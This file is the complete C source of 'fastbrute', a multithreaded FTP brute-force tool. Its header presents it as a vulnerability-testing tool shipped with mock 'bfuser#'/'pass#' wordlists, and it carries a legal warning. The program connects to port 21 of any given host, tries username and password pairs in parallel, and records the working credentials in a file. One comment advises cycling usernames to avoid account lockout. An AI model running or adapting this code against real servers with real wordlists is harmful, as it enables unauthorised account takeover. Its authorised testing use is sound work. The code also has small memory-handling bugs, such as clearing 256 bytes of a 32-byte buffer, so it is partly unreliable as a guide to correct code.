/* 
    fastbrute - fast brute force attack

  This is a vunerability testing tool that can generate a "mock" FTP brute 
  force attack against a server. It reads from two files, "usernames" and
  "passwords" for the username and password lists to try; and creates an 
  output file "found" of successful username/password pairs. 

  The username and password files provided contain usernames of the form
  "bfuser#" eg bfuser1; and passwords of the form "pass#" eg pass1.
  There are 32 such users and passwords in these lists, providing a total
  of 1024 username/passwords pairs that will be checked.

  It can be useful to create an account on the target host with a username
  "bfuser3" and password "pass2", to confirm that this program finds that 
  pair successfully.

 USAGE:
	fastbrute hostname [threads]

  By default the program will run 8 threads. By increasing or decreasing
  the number of threads the speed of the attack can be controlled.

 INSTALLING:
	make
	make install
  Edit the Makefile if the build fails and use settings appropriate for
  your OS.

 VERSION: 07-Nov-2004, ver 0.53

 WARNING: Please don't use this software for anything illegal. That 
  definition differs for every country, please check the law first.
  This is a vunerability testing or assesment tool, not a "cracking" 
  or "hacking" tool - a misidentification that could render owning
  this software illegal in some countries.

  Also beware if a legitimate user on the target server exists with a
  username of the form "bfuser#", as this program could damage their
  account (lock it due to repeated failed logins).

 COPYRIGHT: Copyright (c) 2003 Brendan Gregg.

  This program is free software; you can redistribute it and/or
  modify it under the terms of the GNU General Public License
  as published by the Free Software Foundation; either version 2
  of the License, or (at your option) any later version. 

  This program is distributed in the hope that it will be useful,
  but WITHOUT ANY WARRANTY; without even the implied warranty of
  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  GNU General Public License for more details. 

  You should have received a copy of the GNU General Public License
  along with this program; if not, write to the Free Software Foundation, 
  Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.

  (http://www.gnu.org/copyleft/gpl.html)

 AUTHOR: Brendan Gregg  [Sydney, Australia].

 TODO:
  * Test against different ftp servers (currently tested on different
    versions of wu-ftp).
  * Add more protocols to test.

 HISTORY:
	21-Oct-2003	Brendan Gregg	Created this.
*/

#include <unistd.h>
#include <stdlib.h>
#include <pthread.h>
#include <stdio.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h> 
#include <strings.h>
#include <string.h>


/*********************
    Global constants
**********************/

/* Default max number of threads running at once */
#define DEFAULT_THREADS 8

/* Max number of threads possible */
#define MAX_THREADS 128

/* Max number of usernames that can be loaded */
#define MAX_USERNAMES 1024

/* Max number of passwords that can be loaded */
#define MAX_PASSWORDS 4096

/* print debug messages */
#define DEBUG 0

/* print tried password count messages */
#define TRIED_DEBUG 1

/* max wait seconds for threads to complete */
#define MAX_SECONDS_WAIT 16

/* max extra wait seconds per thread */
#define MAX_SECONDS_EXTRA 4

/* filenames */
char *file_usernames = "usernames";	/* Usernames input filename */
char *file_passwords = "passwords";	/* Passwords input filename */
char *file_found = "found";		/* Output filename */


/*********************
    Global variables
**********************/

/* mutex locks for the threads */
pthread_mutex_t mutex_trys;
pthread_mutex_t mutex_running;

/* username and password lists */
char *Usernames[MAX_USERNAMES];
char *Passwords[MAX_PASSWORDS];

/* number of currently running threads */
int threads_running;

/* 
**  Try struct
**
**  This is used in array form as the main inter-thread communication 
**  method (main thread <-> worker threads). It is mutex locked each time
**  main or a worker thread uses it.
*/
typedef struct Try {
	int found;
	int done;
	char *hostname;
	char *password[3];
	char *username;
} Try;

/* try info holder, one element per thread */
Try trys[MAX_THREADS];


/*************************
    Subroutine Predecs
**************************/

void *thread_function(void *arg);	/* worker thread */
void die(char *message, int status);	/* error message and exit */
int load_usernames();			/* load username list */
int load_passwords();			/* load password list */



/*******************
*   MAIN PROGRAM   *
********************/

/* main - The main program.
**	the main thread keeps an eye on the global int "mutex_running",
**	which is decremented each time a thread completes - reaching zero
**	when all threads have completed.
*/
int main(int argc, char *argv[]) {
   /*
   **  Variable Declaration
   */
   int count;				/* counter */
   int user_max;			/* max element of Username array */
   int pass_max;			/* max element of Password array */
   int user;				/* username currently trying */
   int pass;				/* password currently trying */
   int wait_seconds;			/* thread timeout seconds */
   int num_threads;			/* max num threads to run */
   int threads_left;			/* threads yet to complete */
   int found;				/* successful password loc */
   int last_round;			/* last round of threads? */
   int total;				/* total passwords tried so far */
   pthread_t p_thread[MAX_THREADS];	/* POSIX thread objects */
   char *hostname;			/* target hostname */
   FILE *outfile;			/* output file handle */
   struct hostent *test_addr;		/* only for testing in main */
   user = 0; pass = 0;
   last_round = 0; total = 0;

   fprintf(stdout,"fastbrute ver 0.53\n");


   /*
   **  Command line arguments
   */

   /* check arg count */
   if (argc < 2) {
   	die("USAGE: fastbrute hostname [threads]\n",0);
   }

   /*** calculate number of threads to run ***/
   if (argc == 3) {
   	num_threads = atoi(argv[2]);
   	if (num_threads > MAX_THREADS) num_threads = MAX_THREADS;
   	if (num_threads < 1) num_threads = 1;
   } else {
   	num_threads = DEFAULT_THREADS;
   }

   /* calculate timeout seconds for every round of threads */
   wait_seconds = MAX_SECONDS_WAIT + (MAX_SECONDS_EXTRA * num_threads);

   /*** get target hostname ***/
   hostname = argv[1];
   test_addr = gethostbyname(hostname);
   if (test_addr == NULL) {
   	die("ERROR: No such host",1);
   }

   /*
   ** Load Usernames and Passwords 
   */
   user_max = load_usernames();
   pass_max = load_passwords();
   if (DEBUG) fprintf(stderr,"00. umax %d pmax %d\n",user_max,pass_max);
   fprintf(stdout,"Started...  (Loaded %d usernames, %d passwords)\n",
    (user_max+1),(pass_max+1));

   /* initialise mutex locks, just in case */
   pthread_mutex_init(&mutex_running,NULL);
   pthread_mutex_init(&mutex_trys,NULL);

	
   /*************
      Main Loop
   **************/

   while (1) {

	if (TRIED_DEBUG) fprintf(stdout,"tried %d\n",total);

	/* this remembers how many threads were invoked. this variable is */
	/* decremented as each thread finishes (if it dosen't hang). */
	/* we don't worry about mutex locking this, yet */
	threads_running = num_threads;

	/*
	**  Prepare and Create the threads
	*/
	for(count = 0; count < num_threads; count++) {
		if (DEBUG) fprintf(stderr,"00. getting %d %d\n",user,pass);

		/*
		**  Populate trys with info for the thread
		*/
		pthread_mutex_lock(&mutex_trys);
		trys[count].found = -1;
		trys[count].done = 0;
		trys[count].hostname = strdup(hostname);
		trys[count].username = strdup(Usernames[user]);
		trys[count].password[0] = strdup(Passwords[pass]);
		trys[count].password[1] = strdup(Passwords[pass+1]);
		trys[count].password[2] = strdup(Passwords[pass+2]);
		pthread_mutex_unlock(&mutex_trys);

		/*
		**  Thread Creation
		*/
		if (!(last_round)) {		/* if more passwords to try */
			/*
			**  Create the thread
			*/
			if (pthread_create(&p_thread[count],NULL, 
				thread_function,(void *) count) != 0) {
					fprintf(stderr,
					 "ERROR8: creating a thread\n");
			} 
			total += 3;
		} else {
			/* this one wasn't needed, */
			/* so we'd better not wait for it */
			pthread_mutex_lock(&mutex_running);
			threads_running--;
			pthread_mutex_unlock(&mutex_running);
		}

		/*
		**  Algotithm to choose the next username/password
		**
		**  usernames are stepped through first, followed by
		**  passwords. this is more realistic - any effective
		**  brute force program should be varying usernames the 
		**  most to avoid accout locking (any program that is 
		**  not written by a complete moron anyway).
		*/
		user++;
		if (user > user_max) {
			user = 0;
			pass += 3;
		}
		if (pass > pass_max) {
			pass -= 3;		/* intentional */
			last_round = 1;		/* as it's the last round */
		} 

	}

	/*
	**  Watch the Threads
	**
	**  This keeps an eye on "threads_running", to see when all the
	**  threads complete, then exits the loop. It keeps looking for
	**  around MAX_SECONDS_WAIT before giving up (a thread is stuck).
	**
	**  The number (wait_seconds) represents the maximum number of 
	**  seconds to wait for all the threads to complete. Depending 
	**  on network and target host speed, this value will differ. 
	**  16 seconds plus 4 extra seconds for each thread has been 
	**  reasonable during testing, but every LAN & host
	**  can have different characteristics.
	*/
	for (count = 0; count < wait_seconds; count++) {
		if (DEBUG) fprintf(stderr,"00. Still Running: %d at %d/%d\n",
		 threads_running,count,wait_seconds);

		/*** wait a little. tunable ***/
		sleep(1); /* usleep(1000000); */

		/*** Check how many threads are left ***/
		pthread_mutex_lock(&mutex_running);
		threads_left = threads_running;
		pthread_mutex_unlock(&mutex_running);

		/*** If all threads are done, exit this loop ***/
		if (threads_left == 0) break;
	}

	/*
	**  Cleanup Threads
	*/

	/*** Check how many threads didn't complete ***/
	pthread_mutex_lock(&mutex_running);
	threads_left = threads_running;
	pthread_mutex_unlock(&mutex_running);

	/*** If some threads were still stuck, cancel them ***/
	if (threads_left != 0) {
		pthread_mutex_lock(&mutex_trys);
		for (count = 0; count < num_threads; count++) {
			if (trys[count].done == 0) {
				pthread_cancel(p_thread[count]);
			}
		}
		pthread_mutex_unlock(&mutex_trys);
	} 
	/*** Clean up nicely ***/
	else 
	{
		for (count = 0; count < num_threads; count++) {
			pthread_join(p_thread[count], NULL);
		}
	}

	/*
	**  Check for found passwords
	*/
	for (count = 0; count < num_threads; count++) {
		if (trys[count].found >= 0) {
			/*
			**  Write password to output file
			*/
			found = trys[count].found;
			if (!( outfile = fopen( file_found, "a" ) )) {
				die("ERROR11: Can't write to found",11);
			}
			fprintf(outfile,"%s %s\n",trys[count].username,
			 trys[count].password[found]);
			fclose (outfile);
		}
	}

	if (DEBUG) fprintf(stderr, "00. All threads completed.\n");

	if (last_round) {
		if (TRIED_DEBUG) fprintf(stdout,"tried %d\n",total);
		fprintf(stdout,"Finished.\n");
		exit(0);
	}

   }

   return 0;
}



/******************
*   SUBROUTINES   *
*******************/

/* die - this subroutine prints an error message and exits with a non-zero
** 	exit status.
*/
void die(char *message, int status) {
	fprintf(stderr,"%s\n",message);
	exit(status);
}

/* load_usernames - this subroutine loads the usernames from the file in the
**	global "file_userames" into the global Usernames. 
*/
int load_usernames() {
	char buffer[256];		/* file read buffer */
	char copy[256];			/* for string manipulation */
	FILE *infile;			/* filehandle */
	int user_max;			/* max element of Username array */
	int length;			/* length for strings */

	/*
	** Load Usernames
	*/
	user_max = 0;
	if (!( infile = fopen(file_usernames,"r") )) {
		die("ERROR9: Can't open usernames file",9);
	}
	while ( fgets (buffer,256,infile) ) {
		length = strlen(buffer);
		bzero(copy,256);

		/* strip off the "\n" */
		strncpy(copy,buffer,(length-1));

		/* store username in memory */
		Usernames[user_max] = strdup(copy);
		if (DEBUG) fprintf (stderr,"username %d %s",user_max,buffer);

		/* count how many users were loaded */
		user_max++;

		/* quit before you seg fault */
		if (user_max == MAX_USERNAMES) break;
	}
	fclose(infile);
	
	/* that last username wasn't loaded */
	user_max--;

	return user_max;
}


/* load_passwords - this subroutine loads the passwords from the file in the
**	global "file_passwords" into the global Passwords. 
*/
int load_passwords() {
	char buffer[256];		/* file for read buffer */
	char copy[256];			/* for string manipulation */
	FILE *infile;			/* filehandle */
	int pass_max;			/* max element of Password array */
	int length;			/* length for strings */
	int count;			/* counter */

	/*
	** Load Passwords
	*/
	pass_max = 0;
	if (!( infile = fopen(file_passwords,"r") )) {
		die("ERROR10: Can't open passwords file",10);
	}
	while ( fgets (buffer,256,infile) ) {
		length = strlen(buffer);
		bzero(copy,256);

		/* strip off the "\n" */
		strncpy(copy,buffer,(length-1));

		/* store password in memory */
		Passwords[pass_max] = strdup(copy);
		if (DEBUG) fprintf (stderr,"password %d %s",pass_max,buffer);

		/* count how many passwords were loaded */
		pass_max++;

		/* quit before you seg fault */
		if (pass_max == MAX_PASSWORDS) break;
	}
	fclose(infile);

	/*
	**  Pad the Passwords array with a few extra dummy passwords
	**
	**  (The main program allocates passwords in groups of 3 to the
	**  threads to try. Imagine we only have 1 password left - during
	**  thread allocation the main program will allocate 1 and then try
	**  to read beyond the end of the array (seg fault). An easy way
	**  to avoid this is to pad the array with a few extra passwords).
	*/
	for (count=pass_max; count < (pass_max+3); count++) {
		Passwords[count] = "padding";
	}

	/* that last password wasn't loaded */
	pass_max--;

	return pass_max;
}


/* thread_functions - The worker thread.
**      This subroutine connects to the host and tries a few passwords.
**	This is invoked numerous times (num_threads) as a worker thread. 
**	It is possible that the connection could hang for some reason
**	the main thread detects this by watching "mutex_running" and 
**	can send a pthread_cancel.
*/
void *thread_function(void *arg) {
	/*
	**  Variable Declaration
	*/
	struct sockaddr_in destination;	/* dest socket address */
	struct hostent *dest_addr;	/* dest address */
        char buffer[256];		/* file buffer */
	char *password[3];		/* passwords to try */
	char *username;			/* username to try */
	char *hostname;			/* dest hostname */
	char send_str[256];		/* string to send */
	char result[32];		/* string to read */
        int sock;			/* socket number */
	int length;			/* length for strings */
	int count;			/* counter */
	int dest_port;			/* dest port number */
	int id;				/* thread id */
	int pos;			/* char position */

	/* thread number */
	id = (int) arg;

	if (DEBUG) fprintf(stderr, "%2d: Thread Started.\n", id);

	/*
	** Fetch try info (username, passwords...) 
	*/
	pthread_mutex_lock(&mutex_trys);
	/* get copies of the strings, don't just copy the pointer */
	password[0] = strdup(trys[id].password[0]);
	password[1] = strdup(trys[id].password[1]);
	password[2] = strdup(trys[id].password[2]);
	username = strdup(trys[id].username);
	hostname = strdup(trys[id].hostname);
	pthread_mutex_unlock(&mutex_trys);
	
	/* hostname and port */
	dest_port = 21;
	dest_addr = gethostbyname(hostname);
	if (dest_addr == NULL) {
                die("ERROR1: No such host\n",1);
        }

	/*
	**  Create destination address variable
	*/
	bzero((char *) &destination, sizeof(destination));
        destination.sin_family = AF_INET;
	bcopy((char *)dest_addr->h_addr, 
                (char *)&destination.sin_addr.s_addr,
                dest_addr->h_length);
        destination.sin_port = htons(dest_port);

	/*
	**  Socket Creation
	*/
	sock = socket(AF_INET, SOCK_STREAM, 0);
        if (sock < 0) die("ERROR2: opening socket",2);

	/*
	**  Connect to destination
	*/
	if (connect(sock,(struct sockaddr *)&destination,sizeof(destination))
	 < 0 ) 
                die("ERROR3: connecting",3); 

	/*
	**  Read welcome line
	*/
	bzero(buffer,256);
        length = read(sock,buffer,255);
        if (length < 0) die("ERROR4: reading from socket",4);
        if (DEBUG) printf("%2d: 0. %s",id,buffer);


	/*
	**  Try 3 passwords
	*/
	for (count=0; count < 3; count++) {

		/*
		**  send username and password
		*/
		sprintf(send_str,"USER %s\nPASS %s\n",username,password[count]);
		strcpy(buffer,send_str);
		if (DEBUG) fprintf(stderr,"%2d: TRYING %s %s\n",id,
		 username,password[count]);
		length = write(sock,buffer,strlen(buffer));
		if (length < 0) die("ERROR5: writing to socket",5);

		/*
		**  read "Password required" line
		*/
		bzero(buffer,256);
		length = read(sock,buffer,255);
		if (length < 0) die("ERROR6: reading from socket",6);
		if (DEBUG) printf("%2d: %d.1 %s",id,count,buffer);

		/* 
		**  Check we didn't get both lines back
		**
		**  both "Password required" and the result code sometimes
		**  arrive in the initial read (about 1 time in 100).
		*/
		for (pos=0; pos < 254; pos++) {
			if (buffer[pos] == 10) 		/* 10 is newline */
				break;
		}
		bzero(result,256);
		pos++;					/* hence the 254 */
		if (buffer[pos] != 0) {			/* not null */
			/* 
			**  Ok, we did get two lines back 
			*/
			result[0] = buffer[pos];
			if (DEBUG) printf("%2d: %d.1 also got :%c:\n",id,
			 count,result[0]);
		} else {
			/*
			**  Read the result line from the network
			*/
			bzero(buffer,256);
			length = read(sock,buffer,255);
			if (length < 0) die("ERROR7: reading from socket",7);
			strncpy(result,buffer,1);
			if (DEBUG) printf("%2d: %d.2 :%s: %s",id,count,
			 result,buffer);
		}
		if (strcmp(result,"2") == 0) {
			/*
			**  Found - correct password
			**
			**  here the code starts with "2" (success) not "5".
			*/
			fprintf(stdout,"FOUND: %s %s\n",username,
			 password[count]);

			/* remember which password worked, main reads this */
			pthread_mutex_lock(&mutex_trys);
			trys[id].found = count;
			pthread_mutex_unlock(&mutex_trys);
		}
		
	}

	close(sock);
	
	/*
	**  Let main know I finished OK
	**
	**  Mutex locks are used here as many threads could be accessing
	**  the same variable. The variable was incremented by main when
	**  the thread was created, and is now decremented here to say
	**  the thread is done. Main can asynchronously check this variable.
	*/
	pthread_mutex_lock(&mutex_running);
	threads_running--;
	pthread_mutex_unlock(&mutex_running);
	pthread_mutex_lock(&mutex_trys);
	trys[id].done = 1;
	pthread_mutex_unlock(&mutex_trys);

	if (DEBUG) fprintf(stderr, "%2d. Thread Finished.\n", id);

	/*** if main hasn't cancelled me, exit nicely ***/
	pthread_exit(0);

	return 0;
}


/*********************
*   END OF PROGRAM   *
**********************/


/***************************************************************************/

/* Reminders for myself ... */

/* ----------------- */
/* Indentation style */

/* tabs (tabstop 8). triple space only occasionally. margin of 80 chars. 
   code that has line wrapped is indented with one space. eg,
					fprintf(stdout,"the number is %d\n",
					 number);	 */


/* --------------- */
/* Shortcuts style */

/* the inclination here is not to use them. eg,

	if (num++ > 6)
		num = 0;

   would more likely be written as,

	if (num > 6) {
		num = 0;
	}
	num++;

   for clarity. especially if the code is more complex than the above. */


/* --------------- */
/* Comments style, */

/* Micro comment */

/*** Tiny comment ***/

/*
**  Small Comment
*/

/********************
     Medium Comment 
*********************/

/************************
*     LARGE COMMENT     *
*************************/
